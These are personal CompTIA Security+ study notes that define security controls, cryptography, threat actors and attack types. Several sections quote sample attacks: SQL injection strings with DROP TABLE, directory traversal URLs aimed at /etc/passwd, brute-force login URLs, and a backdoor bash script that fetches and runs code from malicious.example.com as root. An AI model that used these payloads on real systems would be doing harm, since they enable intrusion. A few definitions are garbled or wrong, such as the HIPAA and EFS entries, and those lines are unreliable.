Title: Comptia Security+ Exam Notes
Date: 2-19-2025
Author: Sean Krajewski


## Table of Contents 
1. [Note to Reader](#overview)
2. [Resources](#stuff I used to study)
3. Security Controls
4. Encryption
5. Hashing
6. Digital Signatures
7. Digital Certificates
8. Threat Actor Types
9. Threat Vectors & Attack Surfaces
10. Social Engineering
11. Security Vulnerabilities
12. Malware Attacks
13. Network Attacks
14. Application Attacks
15. Indicators of Malicious Activity
16. Data Protection Concepts
17. Resilience & Recovery
18. Wireless Security Settings
19. Application Security
20. Vulnerability Management
21. Secure Network Protocols
22. Access Controls
23. Password Concepts
24. Incident Response Activities
25. Risk Management Concepts
26. Agreement Types
27. Penetration Testing
28. Blockchain 
29. Linux
30. Tools


1. Note to Reader 

Below are my notes I took while studying to take the Comptia Security+ Exam.
This isn't meant to be 100% thorough and is not a study guide.  It's just my personal resource I created with the aim of reducing
time looking for things. Typically I would write out my notes by hand but I found typing is faster and the Ctrl + F search function 
works for me.  I'm sharing this here because Github because I like using this repo for notes, homelabs, etc.
In order to pass you need a score of 750 of 900 or 83%.  Most of it will be multiple choice but there are performance based questions.
Use these notes as you please.  Hope they help and thank you for reading!



2. Resources

https://skillcertpro.tech/  (cost $20.00 for 15 mock exams, total 900 questions, and 1 cheat sheet)
https://www.examcompass.com/   (tests, quizes to use)
Professer Messer      (lot of free content on YouTube his exams are not free but are excellent!)
(Exam details) https://www.comptia.org/certifications/security#examdetails  
(exam objectives) https://www.examcompass.com/images/comptia-security-plus-sy0-701-exam-objectives-v5.pdf

For PBQs
Practice with labs (e.g., TryHackMe, CyberSecLabs, or CompTIA Labs) to build hands-on skills



3. Security Controls

logical security Controls
aka executed by computer systems, implemented with technology
examples: encryption, IDS (intrusion dection systems), firewalls


managerial security controls:
aka admin controls, aim to reduce security incidents, documented via written policies
examples: org. security policy, risk assestments, security awareness training


operational security controls
aka focus on day-to-day, ensure equipment contines to work as specified, implemented primiarly by people
examples: config management, system backups, patch management


Physical security controls 
are designed to deter, detect, and prevent unauthorized access, theft, damage, or destruction of material assets.
example: lighting, vestibules, fencing/barricades, security guards


preventive security controls: 
example: encryption, sandboxing, anti virus software (AV)


deterrent security controls
examples: warning lights/signs, lighting, video surveillance


detective security controls
examples: log monitoring, CCTV, vulnerability scanning, intrusion dection system (IDS), security audits


corrective security controls
examples: recovering data from backups, disaster recovery plans (DRP), incident response plans(IRP), applying software updates


compensating security controls
examples: backup power systems, Multi-factor authentication (MFA), network segmentation, application sandboxing
provide alternative security measures when primary controls are not feasible.


directive security controls are implemented through documentation i.e. policies, procedures, guidelines
examples: incident response plan (IRP), acceptable use policy (AUP)
AUP sets the rules and guidelines for using an organization‘s network and resources.


CIA triad = confidentiality, integrity, availability   (CIA is basic to information security)


AAA = Authentication, authorization, accounting   (e.g. TACACS+ and RADIUS)
Remote Authentication Dial-In User Service (RADIUS) is widely used for providing centralized AAA (especially in wireless netowrks/remote server access)
Identification: This is the initial step where a user claims an identity, usually with a username or email address, but does not involve proving that identity.
Authorization: This process occurs after authentication and involves granting access to resources based on the authenticated identity‘s permissions.
Accounting: Accounting involves logging and tracking user activities, not the verification of user credentials.

Kerberos is an authentication protocol designed for secure client-server mutual authentication and is highly suitable for large, distributed environments
Secure, mutual authentication, Minimized password transmission

authentication methods for people = usernames/passwords, biometrics, MFA
authentication methods for devices = digital certificates, MFA, MAC addresses
embedded certificate in a smart card holds the user's private key, which is crucial for secure authentication processes

MFA, the ‘Knowledge‘ factor, or ‘Something You Know‘, such as passwords and PINs, is generally considered the weakestMFA 
"something you have" e.g. Entering a temporary verification code sent to your phone
Fingerprint scan: This is an example of “Something You Are“ (biometric authentication).
Using an email as a username: This pertains to “Something You Know“ (knowledge-based information).

EDR (Endpoint Detection and Response) = continuously monitors and analyzes its endpoints for malicious activities and anomalies, and can respond to threats in real-time
Intrusion Detection System (IDS): IDS monitors network traffic for suspicious activities
Network Address Translation (NAT): NAT is used for IP address mapping 
Network Access Control (NAC): NAC manages network access based on compliance policies

De-provisioning is the technical process of revoking a user’s access to an organization's systems and resources when they leave the company, change roles, or no longer require certain privileges.


Defense-in-Depth is a layered security approach that uses multiple security measures across various areas, providing redundancy in the event one measure fails.

Policy Enforcement Point (PEP) = Data Plane component that enforces the security policies defined at the Control Plane by the Policy Decision Point (PDP)

Honeypots mimic real systems to attract cyber attackers, they contain apparent vulnerabilities that are closely monitored by a security team
Honeynet = network of honeypots
Honeypots can be fake websites, databases, files, or servers
Honeyfile contains decoy data i.e. it's fake
Honeyfile is designed to attrack attackers, trigger alerts when accessed, monitor network activity
example: employee_salaries.docx
Honeytoken = designed to track attackers

Reverse Proxy: While it can distribute traffic, its primary role is not load balancing but rather routing client requests to the appropriate server.
VPN Gateway: This is used for secure remote access and does not address the specific requirement of load balancing.
Firewall: A firewall‘s main function is to provide security by monitoring and controlling incoming and outgoing network traffic, not load balancing.
Next-Generation Firewalls (NGFWs) are the ideal solution for a company looking for advanced network security features.
Stateful firewalls provide dynamic packet filtering and monitor the state of active connections

load balancer is the ideal solution for managing high traffic and evenly distributing network load across multiple servers

Split Tunnel and Full Tunnel configurations in VPN connections:
Split Tunnel routes only the internal network traffic through the VPN, while Full Tunnel routes all the user‘s internet traffic through the VPN.

Vertical Scaling refers to the process of adding more resources to an existing server to increase its capacity.

Netflow primary function = To collect and analyze IP traffic statistics for understanding network traffic patterns.
Communication Plan is the dedicated section that outlines how to effectively communicate about security incidents



Wireless jamming attack
example: fluctuating wireless connectivity in the office, with the network being inaccessible on certain days but functioning well on others

Data Owner is responsible for overseeing the organization‘s data policies, guidelines, and procedures.
Data Custodian is typically responsible for the technical environment and database systems where data is stored, not for policy management.
Data Controller determines the purposes and means of processing personal data but does not necessarily manage data quality and standards.
Data Processor is responsible for processing data on behalf of the data controller, which is different from setting policies and ensuring data quality.

Proprietary information refers to data or knowledge that is unique to your organization and critical to maintaining a competitive advantage

Gramm-Leach-Bliley Act (GLBA), also known as the Financial Services Modernization Act of 1999, is a U.S. federal law that specifically applies to financial institutions.
GLBA requires these institutions to provide clear explanations to their customers about their information-sharing practices.

 Trusted Platform Module (TPM) is a hardware-based security device that provides a secure environment for cryptographic operations
an embedded microcontroller used for secure boot, disk encryption, and system integrity verification





4. Encryption

Self-encrypting drive (SED) = Data storage device with hardware-level encryption e.g. 
Full disk encryption (FDE)  = software tech providing confidentiality to storage devices
Encrypting File System (EFS) = MS windows component that enables encryption of individual firewalls
USB data blocker is designed to block unauthorized data transfer through USB ports while allowing charging
HSM (Hardware Security Module) is a physical device that provides a secure environment for various cryptographic operations including the generation, protection, and management of cryptographic keys.

GNU privacy guard (GPG) = used to encrypt/sign data often for secure email + file encryption
Pretty Good Privacy (PGP) = used for encrypting emails, files, and other forms of communication

HTTPS = secures web traffic via SSL/TLS encryption
Secure file transfer protocol (SFTP) = enables secure file transfer over ssh  (SFTP is not an extension of FTP!!)
Secure Shell (SSH) = type of cryptographic network protocol for secure data communication and remote CLI login
Encapsulating Security Payload (ESP) = provides authentication, integrity, confidentiality of IPsec
Virtual private network (VPN) = system that uses a public network but creates a private encrypted connections between remote locations
Real-time transport protocol (RTP) = unsecure real-time delivery of audio/video over an IP network
Secure real-time transport protocol (SRTP) = same as RTP only adds authentication, encryption to secure the message
CCMP = encryption protocol used in wi-fi networks implementing WPA2 standard
Transport Layer Security (TLS) = provides secure commications over a network and is successor to SSL
S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard for encrypting and digitally signing email messages

Techniques for encrpyting are Symmetric (secret/session key) and asymmetric (public key)
Asymmetric encryption requires public key but the message can only be decrypted by a private-key
for example:  encrypt (sign) his message using his private key. The recipient would then use Bob‘s public key to decrypt
example 2: Alice encrypts the message with Bob‘s public key, and Bob decrypts it with his private key.
Asymmetric ciphers: DHE, ECC, RSA

Symmetric ciphers: AES, DES, IDEA, RC4
Symmetric uses the same key for both encryption and decryption 

KEK is just a second layer of crytographic keys that are used in key management systems.

Internet Protocol Security (IPSec) is a suite of protocols used to secure Internet Protocol (IP) communications by encrypting and authenticating each IP packet in a session.
Transport Layer Security (TLS) is the key protocol used to secure web browsing (encrypts the data transmitted between web browsers and web servers)
For IPsec = AH offers authentication and integrity, while ESP provides confidentiality, integrity, and authentication

Cloud Access Security Broker (CASB) is specifically designed to monitor and control access to cloud applications


Internet Key Exchange (IKE) = used to exchange cryptographic keys in IPsec VPNs
Diffie-Hellman Ephemeral (DHE) = key exchange protocol that generates temporary keys for each session providing forward secrecy to protect past and future communications
Perfect Forward Secrecy (PFS) = if one key is compromised the other session keys are not.
ECDHE = a key exchange protrocol that leverages ECC for enhanced security and efficiency

RSA = public key cryptosystem that uses math properties of large prime numbers to secure data  (used with SSH a lot)  it's for key exchange and digital signatures

Elliptic Curve Cryptography (ECC) = ideal for low-powered devices i.e. embedded systems, IoT, mobile for cryptographic solutions
Advanced Encryption Standard (AES) = most secure/efficient encryption algorithm in use today.  (DES, RC4, 3DES are all weak encryption algos)
International Data Encryption Algorithm (IDEA) = symmetric block cipher encryption algorithm.  replaced by modern AES 
Initialization Vector (IV) = is introduced in cryptography to introduce randomness into encryption.  every ciphertext will be different with the same plaintext
Exclusive OR (XOR) = logical operation used in many cyptographic algorithms e.g. stream ciphers and encryption schemes b/c it's reversible
PBKDF2 (Password-Based Key Derivation Function 2) is a widely recognized key stretching algorithm.

KDC (Key Distribution Center).

A KDC is a centralized server used to distribute cryptographic keys and authenticate users and services within a computer network. 
It is a core component of Kerberos, which is a network authentication protocol used to secure communications over an insecure network.


Cipher block chaining (CBC) = chains the ciphertext blocks together such that each one depends on the previous block.
Cipher Feedback (CFB) = transforms a block cipher into a stream cipher which can encrypt individual bits/bytes
Counter mode (CTM) = block cipher mode that combines a unique counter  with encryption key that gnerates random data blocks that are used for encrypting data
Electronic Codebook (ECB) = simplest and weakest block cipher mode.  uses same key to encrypt each block. vulnerable to pattern analysis Attacks
Galois/Counter mode (GCM) = adds authentication + CTM and is widely used in cryptography.  much better than ECB


The longer the key size/key length in cryptographic algorithms the stronger the key b/c the max number of combinations increases.
AES has 3 key lengths 128, 192, 256.  

SHTTP = secure hypertext transfer protocol, it's obsolete for data transfer over the web.

For email security:
DMARC (Domain-based Message Authentication, Reporting, and Conformance) = defines how emails should be handled if they fail DKIM or SPF checks
DKIM (DomainKeys Identified Mail) = Provides a method for the recipient to verify that the email content hasn‘t been altered during transmission  (adds digital cert to email)
DKIM is an authentication method that allows an email sender to digitally sign an outbound message, ensuring the integrity of the message
SPF (Sender Policy Framework) = Allows the domain owner to specify authorized mail servers permitted to send emails on their behalf  (no email spoofing)

for IAM the term federation is the establishment of trust relationships between different organizations to share identity information

FIM (File Integrity Monitoring) refers to the process of ensuring the integrity of files and data by monitoring for any unauthorized changes.
It involves checking the contents of files to detect alterations, deletions, or additions that could indicate malicious activity or corruption.




5. Hashing


Hash = math algo that converts input data of any size into a fixed-size hash value.
same input always makes the same hash value, fixed length, hash value changes even with small changes, collision resistance
widely used in data integrity checks, signatures, password Hashing, blockchain, crptography
purpose is generate a unique fixed-size output from any input data for integrity verification

MD5 (Message-Digest Algorithm 5) and SHA-256 (Secure Hash Algorithm 256-bit) are both cryptographic hash functions.



Message Digest Algorithm (MD5) = deprecated due to collision vulnerabilies
Secure Hash Algorithm (SHA) = several versions like SHA-256, digital signatures, password storage, secure commnications, data integrity. SHA-3 very stronger

HMAC (Hash-based Message Authentication Code) = it's SHA-256 + a secret key
Involves a cryptographic hash function in combination with a secret cryptographic key.

Cyclic Redundancy Check (CRC) =  non-cryptographic hash function often used for error-checking purposes

sanitation = The removal of sensitive data from a system or storage device to prevent unauthorized access.

6. Digital Signatures

Digital signature = verifies authenticity and integrity of digital documents & messages using unique identifier from the sender
ECDSA, RSA, DSA can be used for verifying digital signatures.   (DSA is a gov standard)
Digital Signature Algorithm (DSA) was specifically designed for digital signatures, not used for encryption
RSA is primarily used for secure communication (e.g. SSH) digital signatures, and data encryption
ECDSA is used for digital signatures and does not include a native encrytpion function, it's great for smartcards, mobile devices, IoT!  Fall under ECC category.



7. Digital Certificates

PKI = hierarchical system for the creation, management, storage, distribution, and revocation of digital certificates

Digital certificates = digital document that verifies an individual, device, service, organization in online commications
Registration Authority (RA) role in Public Key Infrastructure (PKI) is accpeting requests for digital certs & authenticating the entity making the request


Certificate Authority (CA)  acts as a third-party of digital certs
 It issues certificates to end-users, based on the authority granted by the root CA
primarily is responsible for issuing digital certs and verify identity of entities (i.e. create and use signing keys for issuing certificates)
Trust is established for a CA By having its root certificate included in the operating system‘s and web browsers‘ trusted root certificate stores.


Certificate Revocation list (CRL) list of revoked certs issed by CA of the PKI make sure revoked certs aren't trusted
Online Certificate Status Protocol (OCSP) = protocol that checks if the revocation status of a cert, better/faster than relying on a published CRL.  This is the fastest!!
Self signed dig. certs. are not trusted by default by web browsers/applications, typically used in trusted environments i.e. internal networks, not backed by trusted/well-known third party
Self  signed certs are free and have no identity validaton.  third party certs cost and require identity validation

Certificate Signing Request (CSR) = file that contains information to send to the cert authority (CA).  CSR contains info about entity, public key, identifying details which CA uses to issue the digital cert
The initial step involves creating an RSA-based private key, which is then used to generate the public key included in the CSR



Wildcard certificate is used to secure multiple subdomains under a primary domain.
Wildcard TLS Certificate is the best choice for Marcus‘s requirement to secure multiple subdomains under his main website with a single certificate. This type of certificate allows for the encryption of the main domain and an unlimited number of its subdomains. 
For instance, a wildcard certificate for *.mysite.com will effectively secure blog.mysite.com, store.mysite.com, and any other subdomains of mysite.com.


Subject Alternative Name (SAN) cert = lets you secure multiple domain names or subdomains with a single cert
Object Identifier (OID) = used to uniquely identify PKI objects



public-private key pair is a pair of keys where one is used for encryption and the other is used for decryption
public key = encryption


8. Threat Actor Types

External: nation-state, organized crime, hacktivist
Internal: insider threat, shadow IT
both: internal/external


nation state:
funding: high 
sophistication:high
motivations: Espionage, political/philosophical beliefs, disruption/chaos, war


organized crime
funding: med-high
sophistication:med-high
motivations: Financial gain, data exfiltration, extortion  (they would most likely strike for financial gain using ransomware or data theft)


unskilled attacker
funding: low 
sophistication: low
motivations: Disruption/chaos, financial gain, revenge


hacktivist
funding: low-med 
sophistication: low-med
motivations: Ethical beliefs, philosophical/political beliefs, disruption/chaos


insider threat
funding: low-high
sophistication: low-high
motivations: Revenge, financial gain, service disruption


shadow IT
funding: low-med
sophistication: low-med
motivations: Convenience, lack of awareness of security risks, meeting specific needs


Advanced Persistent Threat (APT) sophisticated prolonged cyberattacks carried out by usually nation-states.  usually used to maintain long-term access to sensitive systems or data
long-term, strategic cyber campaigns targeted at specific organizations or nations

Shadow IT is IT personnel using unapproved cloud services, apps, devices for work purposes potentially creating security risks and compliance issues.
Unauthorized systems or applications used without official approval.


9. Threat Vectors & Attack Surfaces

attack surface =  refers to all the potential points through which an attacker can interact with a system or network. 

email-based threat vector:
spoofing
phishing
BEC Attacks
Malicious links
Malware attachments

Smishing = is text messages to deliver fraudulent messages aimed at stealing sensitive information  (combo of SMS and phishing)

Instant Messaging threat vectos:
phishing attack 
malware distribution 
spoofing attack
eavesdropping
account hijacking
malicious link/attachments


image-based threat Vectors
steganography (hiding code within an image file)
image spoofing (deepfakes)
malware-embedded images


file-based threat vector
PDF exploits
Malicious macros in documents
Compressed files (ZIP, RAR)
Malicious scripts in web pages
Infected images
Malicious executables


vishing = voice phishing i.e. person calls you to get sensitive info.  

removable devices have 2 threat vectors malware delivery and data exfiltration

client based threat-vectors
 Drive-by download via web browser
 Malicious macro
 usb-based attack
 Infected executable file
 Malicious attachment in email application


agentless software threat vectors
 network protocol vulnerability
 Packet sniffing


Bluetooth threat vectors
bluesmacking i.e. DoS 
Bluejacking: sending unwanted messages usually as a prank
Bluesnarfing: unauthorized access to a bluetooth device to steal data such as contacts,messages
Bluebugging: gaining remote control over bluetooth device to eavesdropping

War Driving. This involves individuals moving around an area to discover and map wireless networks (they look for such as encryption security, signal strength, and SSID)



open service ports are usually the most probable cause of unauthorized access to be exploited on a network entry points
many devices come from the factory with default credentials i.e. username/password that should be changed because they can be looked up online relatively easily.

reducing attack surface = limiting number of active ports/protocols

Common threat vectors for managed service providers (MSPs), vendors, and suppliers are propagation of malware and social engineering techniques (i.e. targeting employees with sensitive data)

unsupported systems/apps that don't receive regular updates/patches are often volnerable to exploits

wireless technologies considered to have potential threat vectors
WPS (wi-fi protected setup)
WEP (wired equivalent privacy)
WPA2
TKIP (Temporal Key Integrity Protocol) = TKIP was designed as an interim security protocol to improve WEP (Wired Equivalent Privacy) security without requiring new hardware
TKIP was later replaced with CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) 


Example of typosquatting :  ‘onlinestorez.com‘ (attacker) instead of ‘onlinestore.com (legit)

Disassociation attack example : Sending a frame that impersonates a client‘s request to end its session with the access point.
A disassociation attack in wireless networking is executed by sending a frame to the access point that mimics a legitimate client‘s request to disconnect




10. Social Engineering


phishing = attackers impersonate legitimate entity to get access
vishing = voice phishing is a social engineering technique that uses telephone system i.e. calls 
smihing = is using sms or text messages to get sensitive data
misinformation = false or misleading info spread UNintentionally
Disinformation = intentially spreading false info

Whaling: type of phishing attack that targets high-level executives (like a CEO) or other high-profile targets

pretexting is social engineering that relies on identity fraud i.e. attacker impersonates someone with a legitimate need for the information, relying on identity fraud as a method of deception
pretexting invovles creating a fabricated scenario i.e. pretext

BEC (business email compromise) = type of phishing that relies on impersonating a business leader/executable

websites are susceptible to watering hole Attacks e.g. attacker makes a fake website similar to the real one and steals the personal info when users login. That's brand impersonation

Bloatware = unwanted software that gets installed alongside another program




11. Security Vulnerabilities


memory injection: application attack that introduces external code into address space of a running program

dynamic link library (DLL): a collection of precompiled functions, allows code to be shared across programs reducing Redundancy
DLL injection application attack that executes a library of code

Buffer overflow: Application overwrites the contents of a memory area that it shouldn't have access to. can cause crashes, data corruption, or even execute malicious code
race condition: A malfunction in a preprogrammed sequential access to a shared resource 
This involves overrunning a buffer‘s boundary in memory, leading to crashes or execution of malicious code, not related to SQL query manipulation
TOC/TOU A type of vulnerability where the state of a resource is verified at one point in time but may change before the resource is actually used

Common type of OS-based vulnerability are:
   Access control and permissions vulnerabilities (weak passwords, privilege escalation)
   Vulnerabilities in installed applications, system utilities, and device drivers
   Memory-related vulnerabilities (memory leaks, buffer overflows, race conditions)
   Patch and update management vulnerabilities (security patch and update delays, malicious updates)
   Vulnerabilities related to system/security misconfigurations
   Network-related vulnerabilities (DoS attacks, remote code execution attacks) 



SQLi (SQL Injection) is a security vulnerability that allows an attacker to insert malicious code (typically SQL statements) into input fields, such as search bars or login forms, to manipulate or execute unauthorized commands on a database.
example: SELECT * FROM users WHERE userName = 'Alice' AND password = '' OR '1' = '1';
Here, the condition '1' = '1' is always true, effectively bypassing authentication by making the WHERE clause evaluate to true regardless of the username or password, allowing unauthorized access to all user records.
Another example:
192.168.4.27 10.10.20.5 /store/item?id=105‘ OR ‘1‘=‘1
192.168.4.27 10.10.20.5 /store/item?id=1 DROP TABLE users



Example of XSS (cross-site scripting) attack
Exploits the trust a user's web browser has in a website
A malicious script is injected into a trusted website
User's browser executes attacker's script
Example of XSS is an attacker injects a malicious script into a comment on a blog, which is then executed by other users‘ browsers, leading to data theft.
Example:
1. Request from IP: 192.0.2.15 – URL: http://webapp.com/search?q=
2. Request from IP: 198.51.100.30 – URL: http://webapp.com/comment?text=
3. Request from IP: 203.0.113.60 – URL: http://webapp.com/login?username=




CSRF (cross-site request forgery) = attacker tricks the user‘s browser into submitting a request to a different 
website where the user is authenticated, leading to unauthorized actions.
example:  The malicious website uses a script to send a request to the financial service website using the user‘s authenticated session, without the user‘s knowledge or consent


Keyloggers are hardware or software tools used to record keystrokes made on a computer keyboard


Security Content Automation Protocol (SCAP) = To facilitate communication between vulnerability scanners and other security and management tools.
By standardizing data formats and communication methods, SCAP enhances the ability of these tools to work together effectively

End of Life (EOL) when a product will likely not receive security patches and other updates

VM escape is where the attacker breaks out of the VM and gains access to the hypervisor or host system
Resource reuse: resources that have been properly allocated might hide a malicious VM that uses that residual data to compromise another VM.

sideloading: installing mobile apps from sources other than official app stores (installs apps from APK files)
jailbreaking: Jailbreaking refers to modifying a mobile device's operating system (typically iOS) to remove restrictions imposed by the manufacturer, allowing the installation of unauthorized software, including apps from outside the official app store.
rooting: gaining admin(root) access to the OS and system apps on android devicies

zero-day attack: type of attack aimed at exploiting vulnerability that is present in already released software

Backdoor example (cron job downloads files as root)
1. #!/bin/bash
2. # System cleanup script
3. …
4. if [ $(whoami) = “root“ ]; then
5. /usr/bin/wget http://malicious.example.com/script -O /tmp/update.sh
6. /bin/bash /tmp/update.sh
7. fi


Firewall vulnerabilies:
example:

1. permit IP any any eq 80 (HTTP)
2. permit IP any any eq 443 (HTTPS)
3. permit IP any any (All Traffic)
4. deny IP any any (Deny all other traffic)

so in this example #3 would negate the others because it lets any ip to access all ports.




12. Malware Attacks


Ransomware is a type of malware that restricts access to a computer system by encrypting files or locking the entire system, 
demanding that the user perform a specific action—typically paying a ransom—to regain access


Trojan horse is a type of software/app that is legit but contains malicious code
RAT (remote access trojan) is one that allows unauthorized access to infected device
example:
The batch file, named sync.bat and located at C:\Windows\Tasks\, contains the following commands:
1. @echo off
2. rem Sync system data
3. net use Z: \\10.0.0.150\data_share /user:sync_user /p:yes
4. Z:\tools\sync_tool.exe
5. net use Z: /delete

 race condition occurs when the behavior of software depends on the sequence or timing of uncontrollable events, such as the state of a resource changing between its check and use. 
 Target of Evaluation (TOE) refers to the specific system, software, or product being assessed for its security properties



Worm is a replicating type of malicious program that can spread across networks.  It basically uses up bandwidth and system resources
spyware gathers info about activity like keystrokes, browsing habits, personal details, without the user's knowledge
Rootkit type of malware that embeds itself deeply into a computer‘s operating system, providing unauthorized root or administrative access to attackers


WORM (Write Once, Read Many).
WORM storage ensures that once data (such as log records) is written, it cannot be modified or deleted, preserving the integrity of the logs. 


13. Network Attacks

DDoS (Distributed Denial of Service) attack, the attacker uses multiple compromised systems (often called zombies) that are part of a botnet to flood the target with traffic
Amplified DDoS attack - it just sends a test (small) request to vulnerable servers followed by larger response

reflected DDoS attack just uses third party servers to with the targets ip spoofed as the source.

DNS amplication attack is like amplifed/reflected DDoS attacks execpt it just exploits open/misconfigured DNS resolvers to generate large traffic directed at a victim
COUNTER BY: disabling open resolution, the DNS servers only respond to queries from authorized users rather than being exploited in an attack.

DNS spoofing - also called DNS cache poisoning. provide false DNS info to a DNS resolvers

DNS cache poisioning Remapping a domain name to a rogue IP address
example:
ww A 10.20.30.40
mail A 10.10.10.10
ftp A 10.10.10.11
The IP address for the ‘www‘ record does not match the company‘s legitimate web server IP address.


Evil Twin attack = same name as the private ‘LibraryNet‘ without verifying its authenticity

domain hijacking - losing control over the domain names due to unlawful applications
Bluesnarfing - gaining unauthorized access to a bluetooth device

wireless disassociation attack e.g. deauthentication, DoS attack
wireless jamming attack would be a DoS attack
IV (Initialization vector) attack focuses on exploiting vulnerabilies in WEP

Downgrade attack = the perpetrator forces a system to downgrade its communication protocol to older, less secure versions. 
This exploit takes advantage of known vulnerabilities in these outdated protocols.


on-path attack is also known as a MITM attack, attackers are on the comms route between two devices, attackers intercept/modify comms
network replay attack = attacker captures sensitive data, resends to reciver trying to gain unauthorized access/tricking the reciver.
replay attack. In this type of attack, the attacker captures valid data, such as encrypted authentication credentials, and reuses them at a later time to impersonate a user and gain unauthorized access.

Session ID has unique identifier, data can be sotred in cookie or embedded as URL parameter, typically stored in client browser
Session replay attack is when the session id is taken and reused to impersonate a user.
Pass the hash = attacker uses hash of the user's password instead of the cleartext.  Some systems accept hash passwords.

Session Hijacking = different IP addresses are using the same session token to access the server
example: 
1. Request from IP: 203.0.113.5 – URL: http://yourcompanywebsite.com/dashboard?sessionToken=xyz123
2. Request from IP: 198.51.100.8 – URL: http://yourcompanywebsite.com/dashboard?sessionToken=xyz123
3. Request from IP: 192.0.2.12 – URL: http://yourcompanywebsite.com/dashboard?sessionToken=xyz123


RFID cloning refers to the unauthorized duplication of security badge information, enabling access to restricted areas without detection.
social engineering: Typically involves psychological manipulation to gain confidential information, not the physical duplication of access credentials

offline brute-force attacks on the SAM and /etc/shadow files to crack passwords without network detection, by repeatedly trying different combinations.
Windows Security Account Manager (SAM)




14. Application Attacks

code injection is how XSS attacks happen i.e inject malicious script to the user.



LDAP injection exploits a protocol used for managing and accessing networked resources
LDAP is a centralized directory service used for storing and managing user accounts, authentication, and authorization information in large organizations. 
It allows multiple applications and services to query and authenticate users against a single directory (e.g., Active Directory, OpenLDAP).
LDAP queries the central directory to verify the user‘s credentials and retrieve their account information



XML injection targets web apps that generat contnet used to store and transport data
Buffer overflow exploits occurs when an attacker overwirtes contents of memory to cuase unpredictable results in an app.
Replay attack intercepts and retransmits valid data exchange between an application and server or another application.


Facilitates privilege escalation attacks
    System/application vulnerabilities
    System/application misconfigurations
    Social engineering techniques
After obtaining initial access through a low-privileged account during a penetration test, the next crucial step is to perform privilege escalation. 
This process involves exploiting vulnerabilities or misconfigurations in the system to gain higher-level privileges, such as administrative access




CSRF/XSRF 
    Exploits the trust a website has in the user's web browser
    A user is tricked by an attacker into submitting unauthorized web requests
    Website executes attacker's requests



dot-dot-slash = directory traversal attack
for example:
 http://www.example.com/var/../etc/passwd
 http://www.example.com/var/www/../../etc/passwd
 http://www.example.com/var/www/files/../../../etc/passwd
 http://www.example.com/var/www/files/images/../../../../etc/passwd

Another example of directory traversal
http://companywebsite.com/app.php?file=../../config%00.txt.
The ‘%00‘ (null byte) is likely an attempt to terminate the string prematurely to manipulate the server‘s processing




15. Indicators of Malicious Activity

Indicator of Compromise (IoC) forensic evidence that helps detect unauthorized access attempts, malware infections, other malicious activities
password brute-forcing attempt can cause an account lockout
Concurrent session usage is when a single acocunt is being used from multiple locations/devices at the same time
Blocked Content is an indicator where a firewall or security measure prevents attempt to deliver malicious payload/authorized action.

Impossible travel is a situation wherein an account is accessed from a location that is physically impossible for the user to be in
Out of cycle logging = logs are make outside of there regular intervals/with abnormal values which might signal malicious activity

SIEM (Security Information and Event Management) = aggregates and analyzes log data from different security devices, providing insights and correlations necessary for effective security management
Extended Detection and Response (XDR) is a security solution that offers broad threat detection and response capabilities across multiple domains and layers of an organization‘s IT environment


Unified Threat Management (UTM) System is the ideal solution for organizations seeking a comprehensive and centrally-managed approach to network security
combine various essential security features into a single platform

Just-In-Time Permissions in a PAM system allow for the temporary elevation of user privileges
Privileged Access Management (PAM) = systems help address the issue of privilege abuse by enforcing the principle of least privilege

Brute force attack example:
URL: http://companywebsite.com/login?username=admin&password=password1
URL: http://companywebsite.com/login?username=admin&password=password2
URL: http://companywebsite.com/login?username=admin&password=password3
URL: http://companywebsite.com/login?username=admin&password=password4
URL: http://companywebsite.com/login?username=admin&password=password5


supply chain attack occurs when a trusted vendor‘s compromised system or software is used as a means to infiltrate an organization‘s network e.g. accounting software is hacked

Security log in Windows Event Viewer = place to review security-related incidents, including failed login attempts
Temporal Accounts are ideal for the financial institution‘s requirements. These accounts are created for a specific purpose and a limited duration

16. Data Protection Concepts

PII = any type of info about an individual that can be used to identify them.
GDPR = regulates personal data privacy of EU citizens (Data covered by the GDPR should be classified as ‘Regulated Data.)
HIPAA = provides privacy prtection for philosophical
PCI DSS = protects credit cardholder data
Encryption methods used to protect data at rest = FDE, SED, EFS 
Encryption methods used to protect data in transit = VPN, IPsec, TLS
Require data to be processed in an unencrypted form = data in use
Non-human readable data = machine language, binary code
DPO = oversees compliance with data protection laws and policies within an organization
GPS = mobile locator app
Geofencing provides control over the usage of a mobile device within a designated area
Encryption coverts plaintext data into ciphertext using an algorithm
hashing takes data and converts it into fixed-sized scripting
key step in effectively implementing a DLP system is to first classify the data on the server.



Data masking:
    replacing sensitive data with fake/modified data while retaining its original form
    allows for data manipulation in environments wehre the actual values are not needed


tokenization = sensitive data is stored in a separate location but can be retrieved with non-sensitive replacement
and can be processed just like original data without revealing the contents.

Time-based One-Time Password (TOTP) example: a token generates new codes automatically at regular intervals, such as every 60 seconds.

Key Stretching is a technique used to enhance the security of stored passwords. It involves applying a cryptographic hash function to the password and then repeating the process multiple times. 
This increases the computational time and effort required to crack the password through brute-force attacks, making simple or short passwords more resistant to such attacks.

Obfuscation = modifies data to make it difficult to understand/reverse engineer (not always with encryption/hiding)
for example: tokenization where sensitive data is replaced with unique identification symbols (tokens) that retain all the essential information about the data without compromising its security.
examples of Obfuscation: tokenization, data masking, steganography


segmentation for securing data advantages
    limits spread of cyberattacks
    compliance i.e. isolating/protecting specific data
    limits user access to sensitive Data


access control mechanisms: ACL, FACL, DAC, MAC, RBAC


SED (self encrypting drive) = data storage device equipped with hardware-level encryption functionality
FDE (full disk encryption) = provides confidentiality for an entire data storage device, encrypting the entire disk to protect the data at rest from unauthorized access
EFS (encrypting file system) = MS windows component that enables encrytpition of individual files


Static Knowledge-Based Authentication (KBA) involves answering predefined personal questions, which the user has previously set up or agreed upon with the service provider
Dynamic KBA: This involves questions generated in real-time based on publicly available information

Biometric Authentication: This type of authentication uses biological characteristics, such as fingerprints or facial recognition
most critical metric is False Acceptance Rate (FAR); you want this as low as possible
False Rejection Rate (FRR)
Crossover Error Rate (CER)  use this to assess accuracy (lower is better) 
CER = The rate at which the system‘s False Acceptance Rate (FAR) equals its False Rejection Rate (FRR)
True Acceptance Rate (TAR): TAR measures the rate of correctly authenticating authorized individuals


Two-Factor Authentication: This requires two different methods of proving identity
Replication involves continuously copying data to another location (which can be on-site or off-site) in real-time or near-real-time.
Server clustering involves linking multiple servers to operate as a cohesive unit. This approach is used to improve system availability and reliability
Extended Detection and Response (XDR) is a cybersecurity solution that integrates various security components to provide a unified and enhanced approach to threat detection
SCADA systems are primarily used in industrial and infrastructure environments to oversee, monitor, and regulate industrial processes and control systems
